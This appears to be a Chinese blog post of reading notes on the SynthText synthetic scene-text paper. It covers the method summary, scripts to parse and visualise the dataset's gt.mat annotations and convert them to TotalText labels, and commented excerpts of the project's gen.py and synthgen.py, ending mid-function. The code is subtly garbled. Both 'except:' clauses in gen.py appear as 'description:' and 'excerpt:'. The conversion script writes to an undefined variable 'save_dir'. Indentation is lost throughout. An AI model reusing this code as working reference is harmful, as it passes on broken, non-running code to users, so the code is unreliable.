    7. 使用泊松图像编辑将文本融入场景中

    png

    (上,从左到右):
    (1) 无文本实例的 RGB 输入图像。
    (2) 预测密集深度图(越暗的区域越近)。
    (3) 颜色和纹理 gPb-UCM 分段。
    (4) 过滤区域:对适合文本的区域随机上色;那些不合适的保留其原始图像像素。
    (下):四个合成的场景文本图像,在单词级别具有轴对齐的边界框注释。

    2.1. Text and Image Sources

    • 文本从 Newsgroups20 数据集中提取单词、行和段落。

    • 为了增加多样性,从谷歌图像搜索提取了 8000 张图像,人工检查丢弃包含文本的图像。

    2.2. Segmentation and Geometry Estimation

    png

    局部颜色/纹理敏感的位置。
    (左)合成文本数据集的示例图像。请注意,文本被限制在街道上的台阶范围内。
    (右)相比之下,这张图片中的文本位置并没有考虑到局部区域的线索。
    • 在真实图像中,文本往往包含在定义良好的区域(例如一个标志)。我们通过要求文本包含在以统一颜色和纹理为特征的区域中来近似此约束。将 gPb-UCM 轮廓层次的阈值设定为 0.11,从而获得区域。
    • 在自然图像中,文字往往被画在表面的顶部(例如一个标志或一个杯子)。为了在我们的合成数据中近似类似的效果,文本根据局部表面法线进行透视转换。首先使用 CNN 对上述分割的区域预测密集深度图,然后使用 RANSAC 对其拟合平面 facet,从而自动估计法线。
    • 将文本对齐到估计的区域方向,步骤如下:
      • 首先,使用估计的平面法线将图像区域轮廓扭曲为正面平行视图;
      • 然后,在前平行区域拟合一个矩形;
      • 最后,文本与这个矩形的大边(“width”)对齐。
      • 当在同一区域放置多个文本实例时,将检查文本蒙版是否相互碰撞,以避免将它们放在彼此的顶部
    • 并不是所有的分割区域都适合文本放置——区域不应该太小,有一个极端的长宽比,或者表面法线与观看方向正交;所有这些区域都在这个阶段进行过滤。此外,还过滤了纹理过多的区域,其中纹理的程度是通过 RGB 图像中的三阶导数的强度来衡量的。

    • 使用 CNN 来估计深度的替代方法是使用 RGBD 图像数据集,这是一个容易出错的过程。我们更喜欢估计一个不完美的深度图,因为:

      • 它基本上允许使用任何场景类型的背景图像,而不仅仅是那些可用的 RGBD 数据,

      • 因为公开可用的 RGBD 数据集都具有很强的限制。

    2.3. Text Rendering and Image Composition

    • 一旦确定了文本的位置和方向,文本就会被分配一种颜色。文本的调色板是从 IIIT5K 单词数据集中裁剪的单词图像中学习的。每个裁剪的单词图像中的像素使用 K-means 划分为两组,产生颜色对,其中一种颜色近似前景(文本)颜色,另一种颜色近似背景。在渲染新文本时,选择背景颜色与目标图像区域最匹配的颜色对(在 Lab 色彩空间中使用 L2-norm),并使用相应的前景颜色来渲染文本。

    • 大约 20% 的文本实例被随机选择为具有边框。边界颜色被选择为与前景颜色相同,其值通道增加或减少,或者被选择为前景和背景颜色的平均值。

    • 为了保持合成文本图像中的光照梯度,我们使用泊松图像编辑将文本混合到基础图像上。

    3. A Fast Text Detection Network

    3.1. Architecture

    ​ 不看了。

    4. Evaluation

    4.1. Datasets

    • SynthText in the Wild
    • ICDAR Datasets
    • Street View Text

    4.2. Text Localisation Experiments

    ​ 好使。

    4.3. Synthetic Dataset Evaluation

    ​ 我们生成了三个复杂程度越来越高的合成训练数据集:

    1. 文本被放置在图像中的随机位置
    2. 限制于局部颜色和纹理边界
    3. 扭曲视角以匹配局部场景深度(同时也尊重如上(2)中的局部颜色和纹理边界)。

    ​ 数据集的所有其他方面都保持不变——例如文本词典、背景图像、颜色分布。

    4.4. End-to-End Text Spotting

    ​ 在文本识别领域的表现。

    4.5. Timings

    ​ 速度不错!

    5. Conclusion

    ​ 设计的模型在现有的数据集里不好使,但是在合成数据集的帮助下就很好使了。

    A.Appendix

    A.1. Variation in Fonts, Colors and Sizes

    png

    ​ 下面的图片显示了同一文本 “vamos!” 的合成文本渲染。

    ​ 沿着行,文本呈现在大致相同的位置和相同的背景图像上,但字体、颜色和大小不同。

    A.2. Poisson Editing vs. Alpha Blending

    png

    ​ 简单 alpha 混合(下一行)和泊松编辑(上一行)的比较。

    ​ 泊松编辑保留局部照明梯度和纹理细节。

    A.3. SynthText in the Wild

    png

    ​ 这些图像显示了不同字体、颜色、大小的文本实例,带有边框和阴影,背景不同,并根据局部几何形状进行转换,并约束于颜色和文本的局部连续区域。GT 的 BBox 用红色标记。

    A.4. ICDAR 2013 Detections

    png

    ​ ICDAR 2013 数据集上来自 “FCRNall + multi-flit”(上行)和来自 Jaderberg 等人(下行)的检测示例。精度,召回率和 F 测量值 (P / R / F) 显示在每个图像的顶部。

    A.5. Street View Text (SVT) Detections

    png

    ​ 在“FCRNall + multi-flit”街景文本 (SVT) 数据集上的检测示例(上一行)和来自 Jaderberg 等人的检测示例(下一行)。

    ​ 精度,召回率和 F 测量值 (P / R / F) 在每张图像的顶部表示:这两种方法在这些图像上的精度都为 1 (除了一个由于缺少地基真值注释的情况)。

    数据集解析

    ​ 从 Synthetic Data for Text Localisation in Natural Images - Academic Torrents 下载 SynthText.zip,解压之:

    png

    ​ 其中每一个文件夹里包含一个场景,里面存放着若干图片,gt.mat 是这些图片的注释。

    ​ 关于 gt.mat 里的解析:SynthText文本数据详细解析_synthtext数据集_Mr.Q的博客-CSDN博客

    ​ 使用 python 读取 gt.mat 文件:

    1
    2
    3
    4
    import scipy.io as sio

    # 读取MAT文件
    data = sio.loadmat(r'D:\dataset\SynthText\SynthText\gt.mat')

    ​ 包含如下属性:

    • imnames:图片路径
    • txt:文本
    • wordBB:单词级标注框
    • charBB:字符级标注框
    1
    len(data['imnames'][0]), len(data['txt'][0]), len(data['wordBB'][0]), len(data['charBB'][0])
    1
    (858750, 858750, 858750, 858750)

    数据集可视化:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 92

    file_dir = r'D:/dataset/SynthText/SynthText/'

    image_path = os.path.join(file_dir, data['imnames'][0][index][0])

    image_origin = cv2.imread(image_path)
    image_bbox = image_origin.copy()
    image_cbox = image_origin.copy()
    height, width, _ = image_origin.shape


    txt = []
    for element in list(data['txt'][0][index]):
    txt.extend(element.split())

    if isinstance(data['wordBB'][0][index][0][0], np.ndarray):
    for i in range(len(data['wordBB'][0][index][0][0])): # bbox
    x = [int(num) for num in data['wordBB'][0][index][0][:, i]]
    y = [int(num) for num in data['wordBB'][0][index][1][:, i]]
    points = np.array([x, y], np.int32).T
    transcriptions = txt[i]

    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image_bbox, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))
    else:
    x = [int(num) for num in data['wordBB'][0][index][0]]
    y = [int(num) for num in data['wordBB'][0][index][1]]
    points = np.array([x, y], np.int32).T
    transcriptions = txt[0]

    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image_bbox, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    if isinstance(data['charBB'][0][index][0][0], np.ndarray):
    for i in range(len(data['charBB'][0][index][0][0])): # cbox
    x = [int(num) for num in data['charBB'][0][index][0][:, i]]
    y = [int(num) for num in data['charBB'][0][index][1][:, i]]
    points = np.array([x, y], np.int32).T

    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    else:
    x = [int(num) for num in data['charBB'][0][index][0]]
    y = [int(num) for num in data['charBB'][0][index][1]]
    points = np.array([x, y], np.int32).T

    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(32, 18))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin: ' + data['imnames'][0][index][0])

    axes[1].imshow(cv2.cvtColor(image_bbox, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('bbox')

    axes[2].imshow(cv2.cvtColor(image_cbox, cv2.COLOR_BGR2RGB))
    axes[2].axis('off')
    axes[2].set_title('cbox')

    plt.tight_layout()
    plt.show()

    png

    转换成 MindOCR 可读的 TotalText 形式

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np
    import shutil
    from tqdm import tqdm

    file_dir = r'D:/dataset/SynthText/SynthText/'
    save_image_dir = r'D:/dataset/SynthText/SynthText/images'
    save_label_dir = r'D:/dataset/SynthText/SynthText/Txts'

    for index in tqdm(range(858750)):
    image_path = os.path.join(file_dir, data['imnames'][0][index][0])
    shutil.copy(image_path, os.path.join(save_image_dir, 'img' + str(index) + '.jpg'))

    string = ""
    txt = []
    for element in list(data['txt'][0][index]):
    txt.extend(element.split())

    if isinstance(data['wordBB'][0][index][0][0], np.ndarray):
    for i in range(len(data['wordBB'][0][index][0][0])): # bbox
    x = [int(num) for num in data['wordBB'][0][index][0][:, i]]
    y = [int(num) for num in data['wordBB'][0][index][1][:, i]]
    points = np.array([x, y], np.int32).T
    transcriptions = txt[i]
    else:
    x = [int(num) for num in data['wordBB'][0][index][0]]
    y = [int(num) for num in data['wordBB'][0][index][1]]
    points = np.array([x, y], np.int32).T
    transcriptions = txt[0]

    string += 'x: [['
    string += ' '.join(map(str, x))
    string += ']], y: [['
    string += ' '.join(map(str, y))
    string += "]], ornt: [u'h"
    string += "'], transcriptions: [u'"
    string += transcriptions
    string += "']\n"

    with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
    file.write(string)

    代码

    ​ 从 ankush-me/SynthText at python3 (github.com) 获取代码,在 Wsl2 下跑,装环境下见招拆招,总能跑的。

    ​ 生成图片:

    1
    python gen.py --viz

    ​ 可视化结果:

    1
    python visualize_results.py

    png

    1
    2
    3
    4
    5
    image name        :  hiking_125.jpg_0
    ** no. of chars : 69
    ** no. of words : 15
    ** text : ['>>Potvin' 'someone\n wrong \ngetting' 'cloud' 'do with' 'Calgary\nfinal'
    'Re:' 'I have' 'a stud\nMorgan']

    读代码(太多了,挑一点看吧)

    gen.py

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    import numpy as np
    import h5py # 用于读写 HDF5 文件格式的数据
    import os, sys, traceback # 用于进行文件和系统操作以及处理异常
    import os.path as osp # 用于处理文件路径
    from synthgen import * # 从 synthgen 模块导入所有内容。synthgen 模块包含了生成合成文本图像的相关函数和类
    from common import * # 从 common 模块导入所有内容。common 模块包含了一些通用的函数和常量。
    import wget, tarfile # 导入 wget 和 tarfile 模块,用于下载和解压文件。


    # Define some configuration variables:
    # 要用于生成的图像数量(-1表示使用所有可用的图像)。
    NUM_IMG = -1 # no. of images to use for generation (-1 to use all available):
    # 每张图像使用的实例数量。
    INSTANCE_PER_IMAGE = 1 # no. of times to use the same image
    # 每张图像的最大处理时间(单位:秒)。
    SECS_PER_IMG = 5 # max time per image in seconds

    # path to the data-file, containing image, depth and segmentation:
    DATA_PATH = 'data' # 数据文件的路径
    DB_FNAME = osp.join(DATA_PATH,'dset.h5') # 数据库文件的完整路径,由数据路径和数据库文件名组合而成。
    # url of the data (google-drive public file):
    DATA_URL = 'http://www.robots.ox.ac.uk/~ankush/data.tar.gz' # 数据的下载链接。
    OUT_FILE = 'results/SynthText.h5' # 输出结果的文件路径。

    def get_data():
    """
    Download the image,depth and segmentation data:
    Returns, the h5 database.
    """
    # 检查存储数据的 h5 文件是否存在,如果不存在则执行数据下载和解压的操作。
    if not osp.exists(DB_FNAME):
    try:
    # 打印提示信息,显示数据下载链接和文件大小。
    colorprint(Color.BLUE,'\tdownloading data (56 M) from: '+DATA_URL,bold=True)
    print()
    sys.stdout.flush()
    # 使用 wget.download() 函数下载数据文件,并指定下载得到的文件名为 "data.tar.gz"。
    out_fname = 'data.tar.gz'
    wget.download(DATA_URL,out=out_fname)
    # 打开 tar 文件并解压文件内容。
    tar = tarfile.open(out_fname)
    tar.extractall()
    # 关闭 tar 文件并删除压缩文件 "data.tar.gz"。
    tar.close()
    os.remove(out_fname)
    # 打印提示信息,显示数据保存的路径。
    colorprint(Color.BLUE,'\n\tdata saved at:'+DB_FNAME,bold=True)
    sys.stdout.flush()
    description: # 下载出现异常,则打印数据未找到的错误信息,并退出程序。
    print (colorize(Color.RED,'Data not found and have problems downloading.',bold=True))
    sys.stdout.flush()
    sys.exit(-1)
    # open the h5 file and return: 打开 h5 文件并以只读方式返回数据库对象。
    return h5py.File(DB_FNAME,'r')


    def add_res_to_db(imgname,res,db):
    """
    将合成的文本图像实例及其相关元数据添加到数据集中。
    Add the synthetically generated text image instance
    and other metadata to the dataset.
    :param imgname: 图像名称
    :param res: 生成的合成文本图像实例
    :param db: 数据库对象
    """
    ninstance = len(res) # 计算生成的合成文本图像实例的数量
    for i in range(ninstance): # 遍历每个实例
    # 首先创建一个数据集(dataset)并将合成图像存储在其中,数据集名称由图像名称和实例索引组成(dname)
    dname = "%s_%d"%(imgname, i)
    db['data'].create_dataset(dname,data=res[i]['img'])
    # 将字符边界框(charBB)和单词边界框(wordBB)作为属性添加到数据集中
    db['data'][dname].attrs['charBB'] = res[i]['charBB']
    db['data'][dname].attrs['wordBB'] = res[i]['wordBB']
    # db['data'][dname].attrs['txt'] = res[i]['txt']
    L = res[i]['txt']
    L = [n.encode("ascii", "ignore") for n in L]
    db['data'][dname].attrs['txt'] = L
    # 返回更新后的数据库对象。


    def main(viz=False):
    # open databases: 打开数据集
    print (colorize(Color.BLUE,'getting data..',bold=True))
    db = get_data()
    print (colorize(Color.BLUE,'\t-> done',bold=True))

    # open the output h5 file: 打开输出 HDF5 文件
    out_db = h5py.File(OUT_FILE,'w')
    out_db.create_group('/data')
    print (colorize(Color.GREEN,'Storing the output in: '+OUT_FILE, bold=True))

    # get the names of the image files in the dataset:
    # 获取数据集中的图像名称列表
    imnames = sorted(db['image'].keys())
    N = len(imnames)
    global NUM_IMG
    if NUM_IMG < 0: # -1 表示使用所有可用的图像
    NUM_IMG = N
    start_idx,end_idx = 0,min(NUM_IMG, N) # 设置开始和结束索引

    RV3 = RendererV3(DATA_PATH,max_time=SECS_PER_IMG)
    for i in range(start_idx,end_idx): # 循环遍历每个图像
    imname = imnames[i]
    try:
    # get the image: 获取图像
    img = Image.fromarray(db['image'][imname][:])
    # get the pre-computed depth: 获取深度信息
    # 这里有 2 个深度估计值(表示为 2 个“通道”),这里我们使用第二个(在某些情况下,使用另一个可能很有用):
    # there are 2 estimates of depth (represented as 2 "channels")
    # here we are using the second one (in some cases it might be
    # useful to use the other one):
    depth = db['depth'][imname][:].T
    depth = depth[:,:,1]
    # get segmentation: 获取分割信息
    seg = db['seg'][imname][:].astype('float32')
    area = db['seg'][imname].attrs['area']
    label = db['seg'][imname].attrs['label']

    # re-size uniformly: 缩放到相同的大小
    sz = depth.shape[:2][::-1]
    img = np.array(img.resize(sz,Image.ANTIALIAS))
    seg = np.array(Image.fromarray(seg).resize(sz,Image.NEAREST))

    print (colorize(Color.RED,'%d of %d'%(i,end_idx-1), bold=True))
    # 使用 RendererV3 生成器,将文本渲染到每个图像中,并将合成文本图像及其相关元数据添加到输出数据库中。
    res = RV3.render_text(img,depth,seg,area,label,
    ninstance=INSTANCE_PER_IMAGE,viz=viz)
    if len(res) > 0:
    # non-empty : successful in placing text: 成功放置文字
    add_res_to_db(imname,res,out_db)
    # visualize the output:
    if viz: # 可视化输出结果
    if 'q' in input(colorize(Color.RED,'continue? (enter to continue, q to exit): ',True)):
    break
    excerpt:
    traceback.print_exc()
    print (colorize(Color.GREEN,'>>>> CONTINUING....', bold=True))
    continue
    db.close()
    out_db.close()


    if __name__=='__main__':
    import argparse
    parser = argparse.ArgumentParser(description='Genereate Synthetic Scene-Text Images')
    parser.add_argument('--viz',action='store_true',dest='viz',default=False,help='flag for turning on visualizations')
    args = parser.parse_args()
    main(args.viz)

    synthgen.py

    Main script for synthetic text rendering.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    from __future__ import division
    import copy
    import cv2
    import h5py
    from PIL import Image
    import numpy as np
    #import mayavi.mlab as mym
    import matplotlib.pyplot as plt
    import os.path as osp
    import scipy.ndimage as sim
    import scipy.spatial.distance as ssd
    import synth_utils as su
    import text_utils as tu
    from colorize3_poisson import Colorize
    from common import *
    import traceback, itertools

    class TextRegions()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    class TextRegions(object):
    """
    Get region from segmentation which are good for placing
    text.
    """
    # 只有当区域的宽度大于等于 minWidth 并且高度大于等于 minHeight 才会被认为是可行的文本区域。
    minWidth = 30 #px
    minHeight = 30 #px
    # 只有当区域的宽度与高度之比介于 minAspect 和 maxAspect 之间时,才会被认为是可行的文本区域
    minAspect = 0.3 # w > 0.3*h
    maxAspect = 7
    # 只有当区域的像素数大于或等于 minArea 时,才会被认为是可行的文本区域
    minArea = 100 # number of pix
    # 只有当区域的像素数大于或等于 minArea 时,才会被认为是可行的文本区域
    pArea = 0.60 # area_obj/area_minrect >= 0.6

    # RANSAC planar fitting params:
    # RANSAC 平面拟合的参数:
    # 距离阈值。如果一个点到拟合平面的距离小于 dist_thresh,则该点被认为是内点。
    dist_thresh = 0.10 # m
    # 内点数量的最小值。如果拟合平面的内点数量小于 num_inlier,则拟合失败。
    num_inlier = 90
    # RANSAC 拟合的迭代次数。每一次迭代都会随机选择一些点进行平面拟合。
    ransac_fit_trials = 100
    # 平面法向量的最小 z 分量。如果平面法向量的 z 分量低于 min_z_projection,则该平面被认为是垂直于摄像机视角的,因此不能用作文本区域。
    min_z_projection = 0.25
    # 用于筛选旋转后的文本区域的最小宽度,只有当它大于 minW 时才会被保留。
    minW = 20

    @staticmethod
    def filter_rectified(mask):
    """
    用于过滤旋转后的文本区域,只有当其宽度和高度都不小于 TextRegions.minW 时才会被保留。
    接收一个二值化的图像作为输入,其中 "1" 表示区域内的像素点,"0" 则表示背景。
    mask : 1 where "ON", 0 where "OFF"
    """
    # 计算出区域在垂直和水平方向上的投影,然后取其中位数。
    wx = np.median(np.sum(mask,axis=0))
    wy = np.median(np.sum(mask,axis=1))
    # 如果两个中位数都大于等于 TextRegions.minW,则返回 True,否则返回 False。
    return wx>TextRegions.minW and wy>TextRegions.minW

    @staticmethod
    def get_hw(pt,return_rot=False):
    # 用于计算旋转矫正后的文本区域的宽度和高度
    pt = pt.copy()
    # 使用 unrotate2d 方法进行旋转校正。这个方法通过计算区域的主轴角度,然后将区域旋转回水平方向。
    R = su.unrotate2d(pt)
    # 计算区域坐标的中位数 mu,并将每个点减去中位数,以便将区域的中心移动到原点。
    mu = np.median(pt,axis=0)
    # 函数应用旋转矩阵 R,将区域进行旋转,并再次将中心移回原来的位置。
    pt = (pt-mu[None,:]).dot(R.T) + mu[None,:]
    # 计算旋转矫正后的区域的宽度和高度,分别等于区域坐标的最大值减去最小值。
    h,w = np.max(pt,axis=0) - np.min(pt,axis=0)
    if return_rot:
    # 如果 return_rot 参数设置为 True,则函数还会返回旋转矩阵 R。
    return h,w,R
    return h,w

    @staticmethod
    def filter(seg,area,label):
    """
    Apply the filter.
    The final list is ranked by area.
    应用过滤器对文本区域进行筛选和排序。
    :seg: 分割图像
    :area: 区域面积
    :label: 区域标签
    """
    # 根据 TextRegions.minArea 将小于最小面积阈值的区域排除,并更新 good 和 area 的值
    good = label[area > TextRegions.minArea]
    area = area[area > TextRegions.minArea]
    filt,R = [],[]
    for idx,i in enumerate(good):
    # 对每个符合要求的区域进行处理。函数首先根据区域的标签 i 生成相应的二值掩膜 mask
    mask = seg==i
    # 使用 np.where 函数获取掩膜上非零像素的坐标,并将其保存到 xs 和 ys
    xs,ys = np.where(mask)
    # 将坐标转换为浮点型的数组 coords
    coords = np.c_[xs,ys].astype('float32')
    # 利用 cv2.minAreaRect 函数计算出最小外接矩形 rect
    rect = cv2.minAreaRect(coords)
    #box = np.array(cv2.cv.BoxPoints(rect))
    # 通过 cv2.boxPoints 函数从矩形中获取四个角点的坐标,保存在 box 中
    box = np.array(cv2.boxPoints(rect))
    # 调用 TextRegions.get_hw 方法获取旋转矫正后的区域的宽度 w、高度 h 和旋转矩阵 rot
    h,w,rot = TextRegions.get_hw(box,return_rot=True)
    # 依次判断以下条件:
    # h > TextRegions.minHeight:区域高度是否大于最小高度阈值;
    # w > TextRegions.minWidth:区域宽度是否大于最小宽度阈值;
    # TextRegions.minAspect < w/h < TextRegions.maxAspect:区域宽高比是否在允许的范围内;
    # area[idx]/w*h > TextRegions.pArea:经过旋转后的区域面积是否大于面积阈值
    # 上述条件全部满足,则将标记为 True,否则标记为 False
    f = (h > TextRegions.minHeight
    and w > TextRegions.minWidth
    and TextRegions.minAspect < w/h < TextRegions.maxAspect
    and area[idx]/w*h > TextRegions.pArea)
    # 将结果保存到列表 filt 中
    filt.append(f)
    # 将旋转矩阵 rot 保存到列表 R 中
    R.append(rot)

    # filter bad regions:
    # 根据 filt 的结果对不符合条件的区域进行过滤
    filt = np.array(filt)
    # 更新 area 和 R
    area = area[filt]
    R = [R[i] for i in range(len(R)) if filt[i]]

    # sort the regions based on areas:
    # 根据区域面积的降序对区域进行排序,并更新 good 和 R
    aidx = np.argsort(-area)
    good = good[filt][aidx]
    R = [R[i] for i in aidx]
    # 返回一个字典 filter_info,包含了筛选后的文本区域的标签、旋转矩阵和面积信息
    filter_info = {'label':good, 'rot':R, 'area': area[aidx]}
    return filter_info

    @staticmethod
    def sample_grid_neighbours(mask,nsample,step=3):
    """
    Given a HxW binary mask, sample 4 neighbours on the grid,
    in the cardinal directions, STEP pixels away.
    :mask: H * W 的二值掩膜
    :nsample: 采样数量
    :step: 采样间隔
    """
    if 2*step >= min(mask.shape[:2]):
    return #None
    # 通过 np.where 函数找到二值掩膜中非零像素的坐标,并将其保存在 y_m 和 x_m 中
    y_m,x_m = np.where(mask)
    # 创建一个和 mask 相同大小的全零矩阵 mask_idx,用于存储每个非零像素的索引
    mask_idx = np.zeros_like(mask,'int32')
    for i in range(len(y_m)):
    mask_idx[y_m[i],x_m[i]] = i
    # 根据给定的步长 step,分别计算出向 x 正方向和负方向、y 正方向和负方向的邻域像素坐标,并保存在 xp、xn、yp 和 yn 中
    xp,xn = np.zeros_like(mask), np.zeros_like(mask)
    yp,yn = np.zeros_like(mask), np.zeros_like(mask)
    xp[:,:-2*step] = mask[:,2*step:]
    xn[:,2*step:] = mask[:,:-2*step]
    yp[:-2*step,:] = mask[2*step:,:]
    yn[2*step:,:] = mask[:-2*step,:]
    # 通过逻辑与运算 &,获取在四个方向上都存在的有效邻域像素,并保存在 valid 中
    valid = mask&xp&xn&yp&yn

    # 通过 np.where 函数找到 valid 中非零像素的坐标,并将其保存在 ys 和 xs 中
    ys,xs = np.where(valid)
    # 如果没有找到任何有效的像素,即 N == 0,则返回 None
    N = len(ys)
    if N==0: #no valid pixels in mask:
    return #None
    # 找到了有效的像素,函数会选择 nsample 个像素进行采样,其中 nsample 取值不超过 N
    nsample = min(nsample,N)
    # 调用 np.random.choice 函数在坐标索引 idx 中选取 nsample 个不重复的索引
    idx = np.random.choice(N,nsample,replace=False)
    # 根据选取的索引,生成邻域矩阵 sample_idx,其形状为 (1+4)x2xNsample(2 表示 y 和 x 坐标)
    # generate neighborhood matrix:
    # (1+4)x2xNsample (2 for y,x)
    xs,ys = xs[idx],ys[idx]
    s = step
    X = np.transpose(np.c_[xs,xs+s,xs+s,xs-s,xs-s][:,:,None],(1,2,0))
    Y = np.transpose(np.c_[ys,ys+s,ys-s,ys+s,ys-s][:,:,None],(1,2,0))
    sample_idx = np.concatenate([Y,X],axis=1)
    # 函数将邻域矩阵转换为邻域索引矩阵 mask_nn_idx,其形状为 5xNsample。
    mask_nn_idx = np.zeros((5,sample_idx.shape[-1]),'int32')
    # 对于每个选取的邻域像素,通过查找 mask_idx 对应位置的值,将相应的索引存储到 mask_nn_idx 中
    for i in range(sample_idx.shape[-1]):
    mask_nn_idx[:,i] = mask_idx[sample_idx[:,:,i][:,0],sample_idx[:,:,i][:,1]]
    # 函数最终返回邻域索引矩阵 mask_nn_idx
    return mask_nn_idx

    @staticmethod
    def filter_depth(xyz,seg,regions):
    """
    这段代码实现了根据给定的点云数据、分割结果和区域信息,对每个区域进行深度滤波的函数
    :xyz: 点云坐标数据
    :seg: 分割结果
    :regions: 区域信息
    """
    # 创建了一个空字典 plane_info,用于保存满足条件的平面信息
    plane_info = {'label':[],
    'coeff':[],
    'support':[],
    'rot':[],
    'area':[]}
    for idx,l in enumerate(regions['label']):
    # 对于 regions 中的每个区域,利用区域标签 l 和分割结果 seg,生成对应的二值掩膜 mask
    mask = seg==l
    # 调用 TextRegions.sample_grid_neighbours 函数,以 mask 为输入,使用 RANSAC 方法进行平面拟合,获取采样点集 pt_sample
    pt_sample = TextRegions.sample_grid_neighbours(mask,TextRegions.ransac_fit_trials,step=3)
    # 如果没有足够的点进行 RANSAC 拟合,则跳过该区域的处理
    if pt_sample is None:
    continue #not enough points for RANSAC
    # get-depths
    # 从点云数据 xyz 中筛选出属于当前区域的点坐标 pt
    pt = xyz[mask]
    # 调用 su.isplanar 函数,以点云数据 pt、采样点集 pt_sample,以及一些阈值参数为输入,进行平面检测。如果检测到平面,返回的 plane_model 中包含平面系数、支持点索引等信息。
    plane_model = su.isplanar(pt, pt_sample,
    TextRegions.dist_thresh,
    TextRegions.num_inlier,
    TextRegions.min_z_projection)
    # 在平面检测结果存在且满足一些要求(例如深度阈值、内点数量等)的情况下,将平面信息存储到 plane_info 字典中的相应字段中。
    if plane_model is not None:
    plane_coeff = plane_model[0]
    if np.abs(plane_coeff[2])>TextRegions.min_z_projection:
    plane_info['label'].append(l)
    plane_info['coeff'].append(plane_model[0])
    plane_info['support'].append(plane_model[1])
    plane_info['rot'].append(regions['rot'][idx])
    plane_info['area'].append(regions['area'][idx])

    return plane_info

    @staticmethod
    def get_regions(xyz,seg,area,label):
    """
    根据给定的点云数据、分割结果、区域面积和区域标签,获取文本区域
    :xyz: 点云坐标数据
    :seg: 分割结果
    :area: 区域面积
    :label: 数据标签
    """
    # 函数调用 TextRegions.filter 函数,以分割结果 seg、区域面积 area 和区域标签 label 为输入,对分割结果进行筛选,获取文本区域的初始信息,保存在变量 regions 中
    regions = TextRegions.filter(seg,area,label)
    # fit plane to text-regions:
